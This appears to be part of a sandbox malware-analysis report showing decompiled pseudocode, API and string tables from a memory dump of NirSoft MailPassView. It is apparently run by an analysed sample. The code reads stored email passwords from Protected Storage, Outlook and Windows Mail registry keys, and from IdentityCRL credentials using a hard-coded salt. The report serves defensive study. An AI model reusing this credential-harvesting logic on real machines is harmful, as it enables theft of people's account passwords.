                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				void* _v304;
                                                                                              				signed int _v308;
                                                                                              				struct HWND__* _v312;
                                                                                              				intOrPtr _v604;
                                                                                              				struct HACCEL__* _v620;
                                                                                              				struct HWND__* _v644;
                                                                                              				char _v900;
                                                                                              				char _v904;
                                                                                              				char _v908;
                                                                                              				struct tagMSG _v936;
                                                                                              				intOrPtr _v940;
                                                                                              				struct HWND__* _v944;
                                                                                              				struct HWND__* _v948;
                                                                                              				char _v956;
                                                                                              				char _v980;
                                                                                              				char _v988;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t49;
                                                                                              				void* _t52;
                                                                                              				int _t56;
                                                                                              				int _t58;
                                                                                              				int _t68;
                                                                                              				void* _t72;
                                                                                              				int _t75;
                                                                                              				int _t77;
                                                                                              				struct HWND__* _t78;
                                                                                              				int _t80;
                                                                                              				int _t85;
                                                                                              				int _t86;
                                                                                              				struct HWND__* _t100;
                                                                                              
                                                                                              				 *0x416b94 = _a4;
                                                                                              				_t49 = E00404837(__ecx);
                                                                                              				if(_t49 != 0) {
                                                                                              					E0040EDAC();
                                                                                              					_t52 = E00406A2C( &_v980);
                                                                                              					_t100 = 0;
                                                                                              					_v940 = 0x20;
                                                                                              					_v948 = 0;
                                                                                              					_v936.hwnd = 0;
                                                                                              					_v944 = 0;
                                                                                              					_v936.message = 0;
                                                                                              					E0040B785(_t52,  &_v900);
                                                                                              					_v8 =  &_v980;
                                                                                              					E00406C87(__eflags,  &_v980, _a12);
                                                                                              					_t56 = E00406DFB(_v16, "/savelangfile");
                                                                                              					__eflags = _t56;
                                                                                              					if(_t56 < 0) {
                                                                                              						E0040823D(); // executed
                                                                                              						_t58 = E00406DFB(_v8, "/deleteregkey");
                                                                                              						__eflags = _t58;
                                                                                              						if(_t58 < 0) {
                                                                                              							 *0x417110 = 0x11223344; // executed
                                                                                              							EnumResourceTypesA( *0x416b94, E0040ED91, 0); // executed
                                                                                              							__eflags =  *0x417110 - 0x1c233487;
                                                                                              							if( *0x417110 == 0x1c233487) {
                                                                                              								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
                                                                                              								if(__eflags <= 0) {
                                                                                              									L13:
                                                                                              									__imp__CoInitialize(_t100);
                                                                                              									E0040B70A( &_v908);
                                                                                              									__eflags = _v604 - 3;
                                                                                              									if(_v604 != 3) {
                                                                                              										_push(5);
                                                                                              									} else {
                                                                                              										_push(3);
                                                                                              									}
                                                                                              									ShowWindow(_v644, ??);
                                                                                              									UpdateWindow(_v644);
                                                                                              									_v620 = LoadAcceleratorsA( *0x416b94, 0x67);
                                                                                              									E0040AD9D( &_v908);
                                                                                              									_t68 = GetMessageA( &_v936, _t100, _t100, _t100);
                                                                                              									__eflags = _t68;
                                                                                              									if(_t68 == 0) {
                                                                                              										L24:
                                                                                              										__imp__CoUninitialize();
                                                                                              										goto L25;
                                                                                              									} else {
                                                                                              										do {
                                                                                              											_t75 = TranslateAcceleratorA(_v644, _v620,  &_v936);
                                                                                              											__eflags = _t75;
                                                                                              											if(_t75 != 0) {
                                                                                              												goto L23;
                                                                                              											}
                                                                                              											_t78 =  *0x4171ac;
                                                                                              											__eflags = _t78 - _t100;
                                                                                              											if(_t78 == _t100) {
                                                                                              												L21:
                                                                                              												_t80 = IsDialogMessageA(_v644,  &_v936);
                                                                                              												__eflags = _t80;
                                                                                              												if(_t80 == 0) {
                                                                                              													TranslateMessage( &_v936);
                                                                                              													DispatchMessageA( &_v936);
                                                                                              												}
                                                                                              												goto L23;
                                                                                              											}
                                                                                              											_t85 = IsDialogMessageA(_t78,  &_v936);
                                                                                              											__eflags = _t85;
                                                                                              											if(_t85 != 0) {
                                                                                              												goto L23;
                                                                                              											}
                                                                                              											goto L21;
                                                                                              											L23:
                                                                                              											_t77 = GetMessageA( &_v936, _t100, _t100, _t100);
                                                                                              											__eflags = _t77;
                                                                                              										} while (_t77 != 0);
                                                                                              										goto L24;
                                                                                              									}
                                                                                              								}
                                                                                              								_t86 = E0040B8D7( &_v904, __eflags);
                                                                                              								__eflags = _t86;
                                                                                              								if(_t86 == 0) {
                                                                                              									_t100 = 0;
                                                                                              									__eflags = 0;
                                                                                              									goto L13;
                                                                                              								}
                                                                                              								_push(_v28);
                                                                                              								_v904 = 0x41356c;
                                                                                              								L004115D6();
                                                                                              								__eflags = _v304;
                                                                                              								if(_v304 != 0) {
                                                                                              									DeleteObject(_v304);
                                                                                              									_v308 = _v308 & 0x00000000;
                                                                                              								}
                                                                                              								goto L27;
                                                                                              							}
                                                                                              							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
                                                                                              							goto L25;
                                                                                              						}
                                                                                              						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
                                                                                              						goto L25;
                                                                                              					} else {
                                                                                              						 *0x417488 = 0x416b28;
                                                                                              						E0040836E();
                                                                                              						L25:
                                                                                              						_push(_v32);
                                                                                              						_v908 = 0x41356c;
                                                                                              						L004115D6();
                                                                                              						__eflags = _v308 - _t100;
                                                                                              						if(_v308 != _t100) {
                                                                                              							DeleteObject(_v308);
                                                                                              							_v312 = _t100;
                                                                                              						}
                                                                                              						L27:
                                                                                              						_v908 = 0x412474;
                                                                                              						E00406A4E( &_v988);
                                                                                              						E0040462E( &_v956);
                                                                                              						E00406A4E( &_v988);
                                                                                              						_t72 = 0;
                                                                                              						__eflags = 0;
                                                                                              						goto L28;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t72 = _t49 + 1;
                                                                                              					L28:
                                                                                              					return _t72;
                                                                                              				}
                                                                                              			}

                                                                                              APIs
                                                                                                • Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,75144DE0,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 00404856
                                                                                                • Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                                • Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 0040487C
                                                                                                • Part of subcall function 00404837: MessageBoxA.USER32 ref: 004048A7
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
                                                                                              • DeleteObject.GDI32(?), ref: 0040BC0E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
                                                                                              • API String ID: 745651260-414181363
                                                                                              • Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                              • Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
                                                                                              • Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                              • Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 65%
                                                                                              			E00403C3D(signed int __ecx, void* __eflags, void* __fp0) {
                                                                                              				char _v8;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				struct HINSTANCE__* _t38;
                                                                                              				void* _t52;
                                                                                              				void* _t54;
                                                                                              				void* _t56;
                                                                                              				void* _t58;
                                                                                              				void* _t60;
                                                                                              				char* _t73;
                                                                                              				void* _t76;
                                                                                              				_Unknown_base(*)()* _t86;
                                                                                              				void* _t87;
                                                                                              				void* _t89;
                                                                                              				signed int _t98;
                                                                                              				char* _t106;
                                                                                              				_Unknown_base(*)()* _t120;
                                                                                              				void* _t131;
                                                                                              
                                                                                              				_t131 = __fp0;
                                                                                              				_t91 = __ecx;
                                                                                              				_push(__ecx);
                                                                                              				_t98 = __ecx;
                                                                                              				_t89 = __ecx + 0x87c;
                                                                                              				 *(_t89 + 0xc) =  *(_t89 + 0xc) & 0x00000000;
                                                                                              				E0040E894(_t89);
                                                                                              				_t38 = LoadLibraryA("pstorec.dll"); // executed
                                                                                              				 *(_t89 + 8) = _t38;
                                                                                              				if(_t38 == 0) {
                                                                                              					L4:
                                                                                              					E0040E894(_t89);
                                                                                              				} else {
                                                                                              					_t86 = GetProcAddress(_t38, "PStoreCreateInstance");
                                                                                              					_t120 = _t86;
                                                                                              					_t91 = 0 | _t120 != 0x00000000;
                                                                                              					 *(_t89 + 0x10) = _t86;
                                                                                              					if(_t120 != 0) {
                                                                                              						goto L4;
                                                                                              					} else {
                                                                                              						_t91 = _t89 + 4;
                                                                                              						_t87 =  *_t86(_t89 + 4, 0, 0, 0);
                                                                                              						_t122 = _t87;
                                                                                              						if(_t87 != 0) {
                                                                                              							goto L4;
                                                                                              						} else {
                                                                                              							 *(_t89 + 0xc) = 1;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				E004047A0(_t98 + 0x890, _t122);
                                                                                              				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Gmail account");
                                                                                              				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Gmail account");
                                                                                              				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Google Account");
                                                                                              				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Google Account");
                                                                                              				_push(_t98 + 0x858); // executed
                                                                                              				E0040754D(_t91, _t122); // executed
                                                                                              				E0040719C(_t91, _t98 + 0x86c); // executed
                                                                                              				E0040765B(_t122, _t98 + 0x878); // executed
                                                                                              				_t52 = E0040EB3F(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
                                                                                              				_t123 = _t52;
                                                                                              				if(_t52 == 0) {
                                                                                              					E00402BB8(_t91,  &_v8, _t123, _t131, _t98, 1);
                                                                                              				}
                                                                                              				_t54 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
                                                                                              				_t124 = _t54;
                                                                                              				if(_t54 == 0) {
                                                                                              					E00402BB8(_t91,  &_v8, _t124, _t131, _t98, 5);
                                                                                              				}
                                                                                              				E00402C44(_t91, _t131, _t98); // executed
                                                                                              				 *((intOrPtr*)(_t98 + 0xb1c)) = 6;
                                                                                              				_t56 = E00406278();
                                                                                              				_push( &_v8);
                                                                                              				if( *((intOrPtr*)(_t56 + 0x10)) != 1) {
                                                                                              					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
                                                                                              				} else {
                                                                                              					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
                                                                                              				}
                                                                                              				_push(0x80000001);
                                                                                              				_t58 = E0040EB3F();
                                                                                              				_t126 = _t58;
                                                                                              				if(_t58 != 0) {
                                                                                              					 *((char*)(_t98 + 0xa9c)) = 0;
                                                                                              				} else {
                                                                                              					E00402B09( &_v8, _t126, _t131, _t98);
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t98 + 0xb1c)) = 0xf;
                                                                                              				_t60 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
                                                                                              				_t127 = _t60;
                                                                                              				if(_t60 != 0) {
                                                                                              					 *((char*)(_t98 + 0xa9c)) = 0;
                                                                                              				} else {
                                                                                              					E00402B09( &_v8, _t127, _t131, _t98);
                                                                                              				}
                                                                                              				E0040E8AB(_t89);
                                                                                              				E004047F1(_t98 + 0x890);
                                                                                              				E00402FC2(_t98, _t91, _t131, 0x80000001); // executed
                                                                                              				E00402FC2(_t98, _t91, _t131, 0x80000002); // executed
                                                                                              				E0040329E(_t131, _t98);
                                                                                              				E004034CB(_t91, _t127, _t131, _t98); // executed
                                                                                              				E0040396C(_t127, _t131, _t98); // executed
                                                                                              				E004037B1(_t91, _t98, _t131, _t98); // executed
                                                                                              				_t73 = _t98 + 0xb20;
                                                                                              				_t128 =  *_t73;
                                                                                              				if( *_t73 != 0) {
                                                                                              					 *((intOrPtr*)(_t98 + 0xf34)) = 0xa;
                                                                                              					E0040D37A(_t98 + 0x1c8, _t128, _t73, 0);
                                                                                              				}
                                                                                              				_t106 = _t98 + 0xc25;
                                                                                              				_t129 =  *_t106;
                                                                                              				if( *_t106 != 0) {
                                                                                              					strcpy(_t98 + 0x52a, _t98 + 0xe2f);
                                                                                              					 *((intOrPtr*)(_t98 + 0xf34)) = 0xb;
                                                                                              					E0040D37A(_t98 + 0x1c8, _t129, _t106, 0);
                                                                                              				}
                                                                                              				_push(_t98 + 0x640); // executed
                                                                                              				E0040D9F9(_t129); // executed
                                                                                              				E0040D865(_t98 + 0x640);
                                                                                              				_t76 = E00410D1B(_t98 + 0x870, _t98 + 0x870); // executed
                                                                                              				return _t76;
                                                                                              			}

                                                                                              APIs
                                                                                                • Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
                                                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
                                                                                              • strcpy.MSVCRT(?,?), ref: 00403E45
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62
                                                                                              • PStoreCreateInstance, xrefs: 00403C6B
                                                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
                                                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
                                                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403CC1
                                                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
                                                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
                                                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7
                                                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
                                                                                              • pstorec.dll, xrefs: 00403C57
                                                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProcstrcpy
                                                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                              • API String ID: 2884822230-961845771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 96%
                                                                                              			E0040D9F9(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
                                                                                              				void* _v0;
                                                                                              				void* __esi;
                                                                                              				long _t34;
                                                                                              				long _t36;
                                                                                              				long _t40;
                                                                                              				void* _t64;
                                                                                              				void* _t68;
                                                                                              				int _t73;
                                                                                              
                                                                                              				E004118A0(0x102c, _t64);
                                                                                              				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
                                                                                              				if(_t34 != 0) {
                                                                                              					L10:
                                                                                              					return _t34;
                                                                                              				}
                                                                                              				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
                                                                                              				if(_t36 != 0) {
                                                                                              					L9:
                                                                                              					_t34 = RegCloseKey(_v0); // executed
                                                                                              					goto L10;
                                                                                              				}
                                                                                              				_a8 = 0x1000;
                                                                                              				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
                                                                                              				_t81 = _t40;
                                                                                              				if(_t40 == 0) {
                                                                                              					_t63 = _a4 + 0xc;
                                                                                              					if(E004047A0(_a4 + 0xc, _t81) != 0) {
                                                                                              						_a20 = _a8;
                                                                                              						_a24 =  &_a40;
                                                                                              						_t73 = 0x40;
                                                                                              						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
                                                                                              						_a28 = _t73;
                                                                                              						_a32 = _t68;
                                                                                              						if(E00404811(_t63,  &_a20,  &_a28,  &_a12) != 0) {
                                                                                              							if(_a12 < 0x400) {
                                                                                              								memcpy( &_a40, _t68, _t73);
                                                                                              								memcpy( &_a104, _a16, _a12);
                                                                                              								E0040D6FB(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
                                                                                              							}
                                                                                              							LocalFree(_a16);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				RegCloseKey(_a4);
                                                                                              				goto L9;
                                                                                              			}












                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
                                                                                              • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
                                                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20
                                                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                              • memcpy.MSVCRT ref: 0040DADD
                                                                                              • memcpy.MSVCRT ref: 0040DAF2
                                                                                                • Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                                • Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
                                                                                                • Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                                • Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
                                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E70,?), ref: 0040DB2A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                              • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                              • API String ID: 2768085393-1693574875
                                                                                              • Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                              • Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
                                                                                              • Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                              • Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				struct HINSTANCE__* _t33;
                                                                                              				intOrPtr* _t35;
                                                                                              				intOrPtr* _t36;
                                                                                              				void* _t39;
                                                                                              				void _t41;
                                                                                              				intOrPtr _t48;
                                                                                              				signed int _t50;
                                                                                              				int _t52;
                                                                                              				intOrPtr _t55;
                                                                                              				signed int _t56;
                                                                                              				signed int _t57;
                                                                                              				intOrPtr _t62;
                                                                                              				intOrPtr _t63;
                                                                                              				intOrPtr* _t65;
                                                                                              				intOrPtr* _t69;
                                                                                              				int _t70;
                                                                                              				void* _t71;
                                                                                              				intOrPtr _t79;
                                                                                              
                                                                                              				_push(0x70);
                                                                                              				_push(0x4123e0);
                                                                                              				E00411840(__ebx, __edi, __esi);
                                                                                              				_t33 = GetModuleHandleA(0);
                                                                                              				if(_t33->i != 0x5a4d) {
                                                                                              					L4:
                                                                                              					 *(_t71 - 0x1c) = 0;
                                                                                              				} else {
                                                                                              					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                                                                                              					if( *_t65 != 0x4550) {
                                                                                              						goto L4;
                                                                                              					} else {
                                                                                              						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
                                                                                              						if(_t56 == 0x10b) {
                                                                                              							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
                                                                                              							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
                                                                                              								goto L4;
                                                                                              							} else {
                                                                                              								_t57 = 0;
                                                                                              								__eflags =  *(_t65 + 0xe8);
                                                                                              								goto L9;
                                                                                              							}
                                                                                              						} else {
                                                                                              							if(_t56 == 0x20b) {
                                                                                              								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
                                                                                              								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
                                                                                              									goto L4;
                                                                                              								} else {
                                                                                              									_t57 = 0;
                                                                                              									__eflags =  *(_t65 + 0xf8);
                                                                                              									L9:
                                                                                              									_t9 = __eflags != 0;
                                                                                              									__eflags = _t9;
                                                                                              									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
                                                                                              								}
                                                                                              							} else {
                                                                                              								goto L4;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				 *(_t71 - 4) = 0;
                                                                                              				__set_app_type(2);
                                                                                              				 *0x417b6c =  *0x417b6c | 0xffffffff;
                                                                                              				 *0x417b70 =  *0x417b70 | 0xffffffff;
                                                                                              				_t35 = __p__fmode();
                                                                                              				_t62 =  *0x416b8c; // 0x0
                                                                                              				 *_t35 = _t62;
                                                                                              				_t36 = __p__commode();
                                                                                              				_t63 =  *0x416b88; // 0x0
                                                                                              				 *_t36 = _t63;
                                                                                              				 *0x417b68 =  *_adjust_fdiv;
                                                                                              				_t39 = E00401A4D();
                                                                                              				_t79 =  *0x416000; // 0x1
                                                                                              				if(_t79 == 0) {
                                                                                              					__setusermatherr(E00401A4D);
                                                                                              					_pop(_t63);
                                                                                              				}
                                                                                              				E0041182C(_t39);
                                                                                              				_push(0x4123b0);
                                                                                              				_push(0x4123ac);
                                                                                              				L00411826();
                                                                                              				_t41 =  *0x416b84; // 0x0
                                                                                              				 *(_t71 - 0x20) = _t41;
                                                                                              				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x416b80, _t71 - 0x20);
                                                                                              				_push(0x4123a8);
                                                                                              				_push(0x412394); // executed
                                                                                              				L00411826(); // executed
                                                                                              				_t69 =  *_acmdln;
                                                                                              				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                                              				if( *_t69 != 0x22) {
                                                                                              					while(1) {
                                                                                              						__eflags =  *_t69 - 0x20;
                                                                                              						if(__eflags <= 0) {
                                                                                              							goto L17;
                                                                                              						}
                                                                                              						_t69 = _t69 + 1;
                                                                                              						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                                              					}
                                                                                              				} else {
                                                                                              					do {
                                                                                              						_t69 = _t69 + 1;
                                                                                              						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                                              						_t55 =  *_t69;
                                                                                              					} while (_t55 != 0 && _t55 != 0x22);
                                                                                              					if( *_t69 == 0x22) {
                                                                                              						L16:
                                                                                              						_t69 = _t69 + 1;
                                                                                              						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                                              					}
                                                                                              				}
                                                                                              				L17:
                                                                                              				_t48 =  *_t69;
                                                                                              				if(_t48 != 0 && _t48 <= 0x20) {
                                                                                              					goto L16;
                                                                                              				}
                                                                                              				 *(_t71 - 0x4c) = 0;
                                                                                              				GetStartupInfoA(_t71 - 0x78);
                                                                                              				_t87 =  *(_t71 - 0x4c) & 0x00000001;
                                                                                              				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
                                                                                              					_t50 = 0xa;
                                                                                              				} else {
                                                                                              					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
                                                                                              				}
                                                                                              				_t52 = E0040B9AD(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
                                                                                              				_t70 = _t52;
                                                                                              				 *(_t71 - 0x7c) = _t70;
                                                                                              				if( *(_t71 - 0x1c) == 0) {
                                                                                              					exit(_t70); // executed
                                                                                              				}
                                                                                              				__imp___cexit();
                                                                                              				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
                                                                                              				return E00411879(_t70);
                                                                                              			}





















                                                                                              0x00411704
                                                                                              0x0041170a
                                                                                              0x00411711
                                                                                              0x00411717
                                                                                              0x00411717
                                                                                              0x00411718
                                                                                              0x0041171d
                                                                                              0x00411722
                                                                                              0x00411727
                                                                                              0x0041172c
                                                                                              0x00411731
                                                                                              0x00411750
                                                                                              0x00411753
                                                                                              0x00411758
                                                                                              0x0041175d
                                                                                              0x0041176a
                                                                                              0x0041176c
                                                                                              0x00411772
                                                                                              0x004117ae
                                                                                              0x004117ae
                                                                                              0x004117b1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004117b3
                                                                                              0x004117b4
                                                                                              0x004117b4
                                                                                              0x00411774
                                                                                              0x00411774
                                                                                              0x00411774
                                                                                              0x00411775
                                                                                              0x00411778
                                                                                              0x0041177a
                                                                                              0x00411785
                                                                                              0x00411787
                                                                                              0x00411787
                                                                                              0x00411788
                                                                                              0x00411788
                                                                                              0x00411785
                                                                                              0x0041178b
                                                                                              0x0041178b
                                                                                              0x0041178f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00411795
                                                                                              0x0041179c
                                                                                              0x004117a2
                                                                                              0x004117a6
                                                                                              0x004117bb
                                                                                              0x004117a8
                                                                                              0x004117a8
                                                                                              0x004117a8
                                                                                              0x004117c3
                                                                                              0x004117c8
                                                                                              0x004117ca
                                                                                              0x004117d0
                                                                                              0x004117d3
                                                                                              0x004117d3
                                                                                              0x004117d9
                                                                                              0x0041180e
                                                                                              0x00411819

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                              • String ID:
                                                                                              • API String ID: 3662548030-0
                                                                                              • Opcode ID: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                                              • Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
                                                                                              • Opcode Fuzzy Hash: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                                              • Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 92%
                                                                                              			E00410D1B(void* __eflags, intOrPtr _a4) {
                                                                                              				void _v275;
                                                                                              				char _v276;
                                                                                              				char _v532;
                                                                                              				void _v539;
                                                                                              				char _v540;
                                                                                              				void _v795;
                                                                                              				char _v796;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				int _t44;
                                                                                              				char* _t46;
                                                                                              				char* _t48;
                                                                                              				void* _t64;
                                                                                              				intOrPtr _t65;
                                                                                              				void* _t66;
                                                                                              				signed int _t68;
                                                                                              				void* _t74;
                                                                                              				void* _t75;
                                                                                              
                                                                                              				_t75 = __eflags;
                                                                                              				_v796 = 0;
                                                                                              				memset( &_v795, 0, 0x104);
                                                                                              				_t64 = 0x1c;
                                                                                              				_t61 =  &_v796;
                                                                                              				 *((intOrPtr*)(_a4 + 4)) = 1;
                                                                                              				E0040EE59( &_v796, _t64); // executed
                                                                                              				E00406734( &_v796, "\\Microsoft\\Windows Mail");
                                                                                              				_t65 = _a4;
                                                                                              				E00410C43(_t65, _t75, _t61); // executed
                                                                                              				 *((intOrPtr*)(_t65 + 4)) = 2;
